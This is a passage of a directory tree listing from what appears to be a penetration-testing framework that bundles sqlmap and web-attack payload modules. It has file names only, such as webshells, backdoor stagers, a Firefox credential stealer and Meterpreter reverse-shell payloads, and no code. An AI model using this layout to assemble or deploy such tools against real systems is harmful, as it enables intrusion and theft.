│ │ │ │ ├── lib │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── controller │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── action.py │ │ │ │ │ │ ├── checks.py │ │ │ │ │ │ ├── controller.py │ │ │ │ │ │ └── handler.py │ │ │ │ │ ├── core │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── agent.py │ │ │ │ │ │ ├── bigarray.py │ │ │ │ │ │ ├── common.py │ │ │ │ │ │ ├── convert.py │ │ │ │ │ │ ├── data.py │ │ │ │ │ │ ├── datatype.py │ │ │ │ │ │ ├── decorators.py │ │ │ │ │ │ ├── defaults.py │ │ │ │ │ │ ├── dicts.py │ │ │ │ │ │ ├── dump.py │ │ │ │ │ │ ├── enums.py │ │ │ │ │ │ ├── exception.py │ │ │ │ │ │ ├── log.py │ │ │ │ │ │ ├── option.py │ │ │ │ │ │ ├── optiondict.py │ │ │ │ │ │ ├── profiling.py │ │ │ │ │ │ ├── readlineng.py │ │ │ │ │ │ ├── replication.py │ │ │ │ │ │ ├── revision.py │ │ │ │ │ │ ├── session.py │ │ │ │ │ │ ├── settings.py │ │ │ │ │ │ ├── shell.py │ │ │ │ │ │ ├── subprocessng.py │ │ │ │ │ │ ├── target.py │ │ │ │ │ │ ├── testing.py │ │ │ │ │ │ ├── threads.py │ │ │ │ │ │ ├── unescaper.py │ │ │ │ │ │ ├── update.py │ │ │ │ │ │ └── wordlist.py │ │ │ │ │ ├── parse │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── banner.py │ │ │ │ │ │ ├── cmdline.py │ │ │ │ │ │ ├── configfile.py │ │ │ │ │ │ ├── handler.py │ │ │ │ │ │ ├── headers.py │ │ │ │ │ │ ├── html.py │ │ │ │ │ │ ├── payloads.py │ │ │ │ │ │ └── sitemap.py │ │ │ │ │ ├── request │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── basic.py │ │ │ │ │ │ ├── basicauthhandler.py │ │ │ │ │ │ ├── comparison.py │ │ │ │ │ │ ├── connect.py │ │ │ │ │ │ ├── direct.py │ │ │ │ │ │ ├── dns.py │ │ │ │ │ │ ├── httpshandler.py │ │ │ │ │ │ ├── inject.py │ │ │ │ │ │ ├── methodrequest.py │ │ │ │ │ │ ├── pkihandler.py │ │ │ │ │ │ ├── rangehandler.py │ │ │ │ │ │ ├── redirecthandler.py │ │ │ │ │ │ └── templates.py │ │ │ │ │ ├── takeover │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── abstraction.py │ │ │ │ │ │ ├── icmpsh.py │ │ │ │ │ │ ├── metasploit.py │ │ │ │ │ │ ├── registry.py │ │ │ │ │ │ ├── udf.py │ │ │ │ │ │ ├── web.py │ │ │ │ │ │ └── xp_cmdshell.py │ │ │ │ │ ├── techniques │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── blind │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ └── inference.py │ │ │ │ │ │ ├── dns │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── test.py │ │ │ │ │ │ │ └── use.py │ │ │ │ │ │ ├── error │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ └── use.py │ │ │ │ │ │ └── union │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── test.py │ │ │ │ │ │ │ └── use.py │ │ │ │ │ └── utils │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── api.py │ │ │ │ │ │ ├── brute.py │ │ │ │ │ │ ├── crawler.py │ │ │ │ │ │ ├── deps.py │ │ │ │ │ │ ├── getch.py │ │ │ │ │ │ ├── har.py │ │ │ │ │ │ ├── hash.py │ │ │ │ │ │ ├── hashdb.py │ │ │ │ │ │ ├── htmlentities.py │ │ │ │ │ │ ├── pivotdumptable.py │ │ │ │ │ │ ├── progress.py │ │ │ │ │ │ ├── purge.py │ │ │ │ │ │ ├── search.py │ │ │ │ │ │ ├── sqlalchemy.py │ │ │ │ │ │ ├── timeout.py │ │ │ │ │ │ ├── versioncheck.py │ │ │ │ │ │ └── xrange.py │ │ │ │ ├── plugins │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── dbms │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── access │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── db2 │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── firebird │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── hsqldb │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── informix │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── maxdb │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── mssqlserver │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── mysql │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── oracle │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── postgresql │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ ├── sqlite │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ │ └── sybase │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ │ └── takeover.py │ │ │ │ │ └── generic │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── connector.py │ │ │ │ │ │ ├── custom.py │ │ │ │ │ │ ├── databases.py │ │ │ │ │ │ ├── entries.py │ │ │ │ │ │ ├── enumeration.py │ │ │ │ │ │ ├── filesystem.py │ │ │ │ │ │ ├── fingerprint.py │ │ │ │ │ │ ├── misc.py │ │ │ │ │ │ ├── search.py │ │ │ │ │ │ ├── syntax.py │ │ │ │ │ │ ├── takeover.py │ │ │ │ │ │ └── users.py │ │ │ │ ├── procs │ │ │ │ │ ├── README.txt │ │ │ │ │ ├── mssqlserver │ │ │ │ │ │ ├── activate_sp_oacreate.sql │ │ │ │ │ │ ├── configure_openrowset.sql │ │ │ │ │ │ ├── configure_xp_cmdshell.sql │ │ │ │ │ │ ├── create_new_xp_cmdshell.sql │ │ │ │ │ │ ├── disable_xp_cmdshell_2000.sql │ │ │ │ │ │ ├── dns_request.sql │ │ │ │ │ │ ├── enable_xp_cmdshell_2000.sql │ │ │ │ │ │ └── run_statement_as_user.sql │ │ │ │ │ ├── mysql │ │ │ │ │ │ ├── dns_request.sql │ │ │ │ │ │ └── write_file_limit.sql │ │ │ │ │ ├── oracle │ │ │ │ │ │ └── dns_request.sql │ │ │ │ │ └── postgresql │ │ │ │ │ │ └── dns_request.sql │ │ │ │ ├── shell │ │ │ │ │ ├── README.txt │ │ │ │ │ ├── backdoors │ │ │ │ │ │ ├── backdoor.asp_ │ │ │ │ │ │ ├── backdoor.aspx_ │ │ │ │ │ │ ├── backdoor.jsp_ │ │ │ │ │ │ └── backdoor.php_ │ │ │ │ │ └── stagers │ │ │ │ │ │ ├── stager.asp_ │ │ │ │ │ │ ├── stager.aspx_ │ │ │ │ │ │ ├── stager.jsp_ │ │ │ │ │ │ └── stager.php_ │ │ │ │ ├── sqlmap.conf │ │ │ │ ├── sqlmap.py │ │ │ │ ├── sqlmapapi.py │ │ │ │ ├── tamper │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── apostrophemask.py │ │ │ │ │ ├── apostrophenullencode.py │ │ │ │ │ ├── appendnullbyte.py │ │ │ │ │ ├── base64encode.py │ │ │ │ │ ├── between.py │ │ │ │ │ ├── bluecoat.py │ │ │ │ │ ├── chardoubleencode.py │ │ │ │ │ ├── charencode.py │ │ │ │ │ ├── charunicodeencode.py │ │ │ │ │ ├── charunicodeescape.py │ │ │ │ │ ├── commalesslimit.py │ │ │ │ │ ├── commalessmid.py │ │ │ │ │ ├── commentbeforeparentheses.py │ │ │ │ │ ├── concat2concatws.py │ │ │ │ │ ├── equaltolike.py │ │ │ │ │ ├── escapequotes.py │ │ │ │ │ ├── greatest.py │ │ │ │ │ ├── halfversionedmorekeywords.py │ │ │ │ │ ├── htmlencode.py │ │ │ │ │ ├── ifnull2casewhenisnull.py │ │ │ │ │ ├── ifnull2ifisnull.py │ │ │ │ │ ├── informationschemacomment.py │ │ │ │ │ ├── least.py │ │ │ │ │ ├── lowercase.py │ │ │ │ │ ├── modsecurityversioned.py │ │ │ │ │ ├── modsecurityzeroversioned.py │ │ │ │ │ ├── multiplespaces.py │ │ │ │ │ ├── nonrecursivereplacement.py │ │ │ │ │ ├── overlongutf8.py │ │ │ │ │ ├── percentage.py │ │ │ │ │ ├── plus2concat.py │ │ │ │ │ ├── plus2fnconcat.py │ │ │ │ │ ├── randomcase.py │ │ │ │ │ ├── randomcomments.py │ │ │ │ │ ├── securesphere.py │ │ │ │ │ ├── sp_password.py │ │ │ │ │ ├── space2comment.py │ │ │ │ │ ├── space2dash.py │ │ │ │ │ ├── space2hash.py │ │ │ │ │ ├── space2morecomment.py │ │ │ │ │ ├── space2morehash.py │ │ │ │ │ ├── space2mssqlblank.py │ │ │ │ │ ├── space2mssqlhash.py │ │ │ │ │ ├── space2mysqlblank.py │ │ │ │ │ ├── space2mysqldash.py │ │ │ │ │ ├── space2plus.py │ │ │ │ │ ├── space2randomblank.py │ │ │ │ │ ├── symboliclogical.py │ │ │ │ │ ├── unionalltounion.py │ │ │ │ │ ├── unmagicquotes.py │ │ │ │ │ ├── uppercase.py │ │ │ │ │ ├── varnish.py │ │ │ │ │ ├── versionedkeywords.py │ │ │ │ │ ├── versionedmorekeywords.py │ │ │ │ │ └── xforwardedfor.py │ │ │ │ ├── thirdparty │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ansistrm │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── ansistrm.py │ │ │ │ │ ├── beautifulsoup │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── beautifulsoup.py │ │ │ │ │ ├── bottle │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── bottle.py │ │ │ │ │ ├── chardet │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── big5freq.py │ │ │ │ │ │ ├── big5prober.py │ │ │ │ │ │ ├── chardetect.py │ │ │ │ │ │ ├── chardistribution.py │ │ │ │ │ │ ├── charsetgroupprober.py │ │ │ │ │ │ ├── charsetprober.py │ │ │ │ │ │ ├── codingstatemachine.py │ │ │ │ │ │ ├── compat.py │ │ │ │ │ │ ├── constants.py │ │ │ │ │ │ ├── cp949prober.py │ │ │ │ │ │ ├── escprober.py │ │ │ │ │ │ ├── escsm.py │ │ │ │ │ │ ├── eucjpprober.py │ │ │ │ │ │ ├── euckrfreq.py │ │ │ │ │ │ ├── euckrprober.py │ │ │ │ │ │ ├── euctwfreq.py │ │ │ │ │ │ ├── euctwprober.py │ │ │ │ │ │ ├── gb2312freq.py │ │ │ │ │ │ ├── gb2312prober.py │ │ │ │ │ │ ├── hebrewprober.py │ │ │ │ │ │ ├── jisfreq.py │ │ │ │ │ │ ├── jpcntx.py │ │ │ │ │ │ ├── langbulgarianmodel.py │ │ │ │ │ │ ├── langcyrillicmodel.py │ │ │ │ │ │ ├── langgreekmodel.py │ │ │ │ │ │ ├── langhebrewmodel.py │ │ │ │ │ │ ├── langhungarianmodel.py │ │ │ │ │ │ ├── langthaimodel.py │ │ │ │ │ │ ├── latin1prober.py │ │ │ │ │ │ ├── mbcharsetprober.py │ │ │ │ │ │ ├── mbcsgroupprober.py │ │ │ │ │ │ ├── mbcssm.py │ │ │ │ │ │ ├── sbcharsetprober.py │ │ │ │ │ │ ├── sbcsgroupprober.py │ │ │ │ │ │ ├── sjisprober.py │ │ │ │ │ │ ├── universaldetector.py │ │ │ │ │ │ └── utf8prober.py │ │ │ │ │ ├── clientform │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── clientform.py │ │ │ │ │ ├── colorama │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── ansi.py │ │ │ │ │ │ ├── ansitowin32.py │ │ │ │ │ │ ├── initialise.py │ │ │ │ │ │ ├── win32.py │ │ │ │ │ │ └── winterm.py │ │ │ │ │ ├── fcrypt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── fcrypt.py │ │ │ │ │ ├── gprof2dot │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── gprof2dot.py │ │ │ │ │ ├── keepalive │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── keepalive.py │ │ │ │ │ ├── magic │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── magic.py │ │ │ │ │ ├── multipart │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── multipartpost.py │ │ │ │ │ ├── odict │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── odict.py │ │ │ │ │ ├── oset │ │ │ │ │ │ ├── LICENSE.txt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── _abc.py │ │ │ │ │ │ └── pyoset.py │ │ │ │ │ ├── prettyprint │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── prettyprint.py │ │ │ │ │ ├── pydes │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── pyDes.py │ │ │ │ │ ├── socks │ │ │ │ │ │ ├── LICENSE │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── socks.py │ │ │ │ │ ├── termcolor │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── termcolor.py │ │ │ │ │ ├── wininetpton │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── win_inet_pton.py │ │ │ │ │ └── xdot │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── xdot.py │ │ │ │ ├── txt │ │ │ │ │ ├── checksum.md5 │ │ │ │ │ ├── common-columns.txt │ │ │ │ │ ├── common-outputs.txt │ │ │ │ │ ├── common-tables.txt │ │ │ │ │ ├── keywords.txt │ │ │ │ │ ├── smalldict.txt │ │ │ │ │ ├── user-agents.txt │ │ │ │ │ └── wordlist.zip │ │ │ │ ├── udf │ │ │ │ │ ├── README.txt │ │ │ │ │ ├── mysql │ │ │ │ │ │ ├── linux │ │ │ │ │ │ │ ├── 32 │ │ │ │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ │ │ │ │ └── 64 │ │ │ │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ │ │ │ └── windows │ │ │ │ │ │ │ ├── 32 │ │ │ │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ │ │ │ │ │ └── 64 │ │ │ │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ │ │ │ └── postgresql │ │ │ │ │ │ ├── linux │ │ │ │ │ │ ├── 32 │ │ │ │ │ │ │ ├── 8.2 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 8.3 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 8.4 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.0 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.1 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.2 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.3 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ └── 9.4 │ │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ └── 64 │ │ │ │ │ │ │ ├── 8.2 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 8.3 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 8.4 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.0 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.1 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.2 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ ├── 9.3 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ │ └── 9.4 │ │ │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ │ │ └── windows │ │ │ │ │ │ └── 32 │ │ │ │ │ │ ├── 8.2 │ │ │ │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ │ │ │ ├── 8.3 │ │ │ │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ │ │ │ ├── 8.4 │ │ │ │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ │ │ │ └── 9.0 │ │ │ │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ │ ├── waf │ │ │ │ │ ├── 360.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── airlock.py │ │ │ │ │ ├── anquanbao.py │ │ │ │ │ ├── armor.py │ │ │ │ │ ├── aws.py │ │ │ │ │ ├── baidu.py │ │ │ │ │ ├── barracuda.py │ │ │ │ │ ├── bigip.py │ │ │ │ │ ├── binarysec.py │ │ │ │ │ ├── blockdos.py │ │ │ │ │ ├── ciscoacexml.py │ │ │ │ │ ├── cloudflare.py │ │ │ │ │ ├── cloudfront.py │ │ │ │ │ ├── comodo.py │ │ │ │ │ ├── datapower.py │ │ │ │ │ ├── denyall.py │ │ │ │ │ ├── dosarrest.py │ │ │ │ │ ├── dotdefender.py │ │ │ │ │ ├── edgecast.py │ │ │ │ │ ├── expressionengine.py │ │ │ │ │ ├── fortiweb.py │ │ │ │ │ ├── generic.py │ │ │ │ │ ├── hyperguard.py │ │ │ │ │ ├── incapsula.py │ │ │ │ │ ├── isaserver.py │ │ │ │ │ ├── jiasule.py │ │ │ │ │ ├── knownsec.py │ │ │ │ │ ├── kona.py │ │ │ │ │ ├── modsecurity.py │ │ │ │ │ ├── naxsi.py │ │ │ │ │ ├── netcontinuum.py │ │ │ │ │ ├── netscaler.py │ │ │ │ │ ├── newdefend.py │ │ │ │ │ ├── nsfocus.py │ │ │ │ │ ├── paloalto.py │ │ │ │ │ ├── profense.py │ │ │ │ │ ├── proventia.py │ │ │ │ │ ├── radware.py │ │ │ │ │ ├── requestvalidationmode.py │ │ │ │ │ ├── safe3.py │ │ │ │ │ ├── safedog.py │ │ │ │ │ ├── secureiis.py │ │ │ │ │ ├── senginx.py │ │ │ │ │ ├── sitelock.py │ │ │ │ │ ├── sonicwall.py │ │ │ │ │ ├── sophos.py │ │ │ │ │ ├── stingray.py │ │ │ │ │ ├── sucuri.py │ │ │ │ │ ├── tencent.py │ │ │ │ │ ├── teros.py │ │ │ │ │ ├── trafficshield.py │ │ │ │ │ ├── urlscan.py │ │ │ │ │ ├── uspses.py │ │ │ │ │ ├── varnish.py │ │ │ │ │ ├── wallarm.py │ │ │ │ │ ├── watchguard.py │ │ │ │ │ ├── webappsecure.py │ │ │ │ │ ├── webknight.py │ │ │ │ │ ├── wordfence.py │ │ │ │ │ ├── yundun.py │ │ │ │ │ ├── yunsuo.py │ │ │ │ │ └── zenedge.py │ │ │ │ └── xml │ │ │ │ │ ├── banner │ │ │ │ │ ├── generic.xml │ │ │ │ │ ├── mssql.xml │ │ │ │ │ ├── mysql.xml │ │ │ │ │ ├── oracle.xml │ │ │ │ │ ├── postgresql.xml │ │ │ │ │ ├── server.xml │ │ │ │ │ ├── servlet-engine.xml │ │ │ │ │ ├── set-cookie.xml │ │ │ │ │ ├── sharepoint.xml │ │ │ │ │ ├── x-aspnet-version.xml │ │ │ │ │ └── x-powered-by.xml │ │ │ │ │ ├── boundaries.xml │ │ │ │ │ ├── errors.xml │ │ │ │ │ ├── livetests.xml │ │ │ │ │ ├── payloads │ │ │ │ │ ├── boolean_blind.xml │ │ │ │ │ ├── error_based.xml │ │ │ │ │ ├── inline_query.xml │ │ │ │ │ ├── stacked_queries.xml │ │ │ │ │ ├── time_blind.xml │ │ │ │ │ └── union_query.xml │ │ │ │ │ └── queries.xml │ │ │ ├── sqlmap_wrapper.py │ │ │ └── tests │ │ │ │ ├── test_sqlmap_update.py │ │ │ │ └── test_sqlmap_wrapper.py │ │ ├── eval.py │ │ ├── file_upload.py │ │ ├── local_file_reader.py │ │ ├── os_commanding.py │ │ ├── payloads │ │ │ ├── __init__.py │ │ │ ├── base_payload.py │ │ │ ├── code │ │ │ │ ├── code.php │ │ │ │ └── code.py │ │ │ ├── decorators │ │ │ │ ├── __init__.py │ │ │ │ ├── download_decorator.py │ │ │ │ ├── exec_decorator.py │ │ │ │ └── read_decorator.py │ │ │ ├── misc │ │ │ │ ├── __init__.py │ │ │ │ ├── file_crawler.py │ │ │ │ └── get_files.py │ │ │ ├── payload_handler.py │ │ │ ├── payloads │ │ │ │ ├── __init__.py │ │ │ │ ├── apache_config_directory.py │ │ │ │ ├── apache_config_files.py │ │ │ │ ├── apache_htaccess.py │ │ │ │ ├── apache_mod_security.py │ │ │ │ ├── apache_root_directory.py │ │ │ │ ├── apache_run_group.py │ │ │ │ ├── apache_run_user.py │ │ │ │ ├── apache_ssl.py │ │ │ │ ├── apache_version.py │ │ │ │ ├── arp_cache.py │ │ │ │ ├── cpu_info.py │ │ │ │ ├── current_user.py │ │ │ │ ├── dhcp_config_files.py │ │ │ │ ├── dns_config_files.py │ │ │ │ ├── domainname.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── firefox_stealer.py │ │ │ │ ├── ftp_config_files.py │ │ │ │ ├── gcc_version.py │ │ │ │ ├── get_hashes.py │ │ │ │ ├── get_source_code.py │ │ │ │ ├── hostname.py │ │ │ │ ├── hosts.py │ │ │ │ ├── iis_root_directory.py │ │ │ │ ├── interesting_files.py │ │ │ │ ├── is_root.py │ │ │ │ ├── kerberos_config_files.py │ │ │ │ ├── kernel_version.py │ │ │ │ ├── ldap_config_files.py │ │ │ │ ├── list_kernel_modules.py │ │ │ │ ├── list_processes.py │ │ │ │ ├── log_reader.py │ │ │ │ ├── mail_config_files.py │ │ │ │ ├── metasploit.py │ │ │ │ ├── msf_linux_x86_meterpreter_reverse.py │ │ │ │ ├── msf_windows_meterpreter_reverse_tcp.py │ │ │ │ ├── msf_windows_vncinject_reverse.py │ │ │ │ ├── mysql_config.py │ │ │ │ ├── mysql_config_directory.py │ │ │ │ ├── netcat_installed.py │ │ │ │ ├── os_fingerprint.py │ │ │ │ ├── php_sca.py │ │ │ │ ├── pixy.py │ │ │ │ ├── portscan.py │ │ │ │ ├── read_mail.py │ │ │ │ ├── root_login_allowed.py │ │ │ │ ├── rootkit_hunter.py │ │ │ │ ├── rootkit_hunter │ │ │ │ │ └── rootkit_hunter_files.db │ │ │ │ ├── route.py │ │ │ │ ├── running_honeypot.py │ │ │ │ ├── running_vm.py │ │ │ │ ├── smb_config_files.py │ │ │ │ ├── spider.py │ │ │ │ ├── ssh_config_files.py │ │ │ │ ├── ssh_version.py │ │ │ │ ├── svn_config_files.py │ │ │ │ ├── tcp.py │ │ │ │ ├── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── payload_test_helper.py │ │ │ │ │ ├── payload_test_helper_exec.py │ │ │ │ │ ├── test_apache_config_directory.py │ │ │ │ │ ├── test_apache_config_files.py │ │ │ │ │ ├── test_apache_htaccess.py │ │ │ │ │ ├── test_apache_mod_security.py │ │ │ │ │ ├── test_apache_root_directory.py │ │ │ │ │ ├── test_apache_run_group.py │ │ │ │ │ ├── test_apache_run_user.py │ │ │ │ │ ├── test_apache_ssl.py │ │ │ │ │ ├── test_apache_version.py │ │ │ │ │ ├── test_arp_cache.py │ │ │ │ │ ├── test_cpu_info.py │ │ │ │ │ ├── test_current_user.py │ │ │ │ │ ├── test_dhcp_config_files.py │ │ │ │ │ ├── test_dns_config_files.py │ │ │ │ │ ├── test_domainname.py │ │ │ │ │ ├── test_filesystem.py │ │ │ │ │ ├── test_firefox_stealer.py │ │ │ │ │ ├── test_ftp_config_files.py │ │ │ │ │ ├── test_gcc_version.py │ │ │ │ │ ├── test_get_hashes.py │ │ │ │ │ ├── test_get_source_code.py │ │ │ │ │ ├── test_hostname.py │ │ │ │ │ ├── test_hosts.py │ │ │ │ │ ├── test_iis_root_directory.py │ │ │ │ │ ├── test_interesting_files.py │ │ │ │ │ ├── test_is_root.py │ │ │ │ │ ├── test_kerberos_config_files.py │ │ │ │ │ ├── test_kernel_version.py │ │ │ │ │ ├── test_ldap_config_files.py │ │ │ │ │ ├── test_list_kernel_modules.py │ │ │ │ │ ├── test_list_processes.py │ │ │ │ │ ├── test_log_reader.py │ │ │ │ │ ├── test_mail_config_files.py │ │ │ │ │ ├── test_mysql_config.py │ │ │ │ │ ├── test_mysql_config_directory.py │ │ │ │ │ ├── test_netcat_installed.py │ │ │ │ │ ├── test_os_fingerprint.py │ │ │ │ │ ├── test_payload_handler.py │ │ │ │ │ ├── test_php_sca.py │ │ │ │ │ ├── test_pixy.py │ │ │ │ │ ├── test_portscan.py │ │ │ │ │ ├── test_read_mail.py │ │ │ │ │ ├── test_root_login_allowed.py │ │ │ │ │ ├── test_rootkit_hunter.py │ │ │ │ │ ├── test_route.py │ │ │ │ │ ├── test_running_honeypot.py │ │ │ │ │ ├── test_running_vm.py │ │ │ │ │ ├── test_smb_config_files.py │ │ │ │ │ ├── test_spider.py │ │ │ │ │ ├── test_ssh_config_files.py │ │ │ │ │ ├── test_ssh_version.py │ │ │ │ │ ├── test_svn_config_files.py │ │ │ │ │ ├── test_tcp.py │ │ │ │ │ ├── test_udp.py │ │ │ │ │ ├── test_uptime.py │ │ │ │ │ ├── test_users.py │ │ │ │ │ ├── test_users_config_files.py │ │ │ │ │ ├── test_w3af_agent.py │ │ │ │ │ └── unittest_coverage.py │ │ │ │ ├── udp.py │ │ │ │ ├── uptime.py │ │ │ │ ├── users.py │ │ │ │ ├── users_config_files.py │ │ │ │ └── w3af_agent.py │ │ │ ├── shell_handler.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_base_payload.py │ │ │ │ └── test_shell_handler.py │ │ │ └── webshell │ │ │ │ ├── webshell.asp │ │ │ │ ├── webshell.aspx │ │ │ │ ├── webshell.jsp │ │ │ │ ├── webshell.php │ │ │ │ ├── webshell.pl │ │ │ │ └── webshell.py │ │ ├── rfi.py │ │ ├── rfi_proxy │ │ │ └── rfip.txt │ │ ├── sqlmap.py 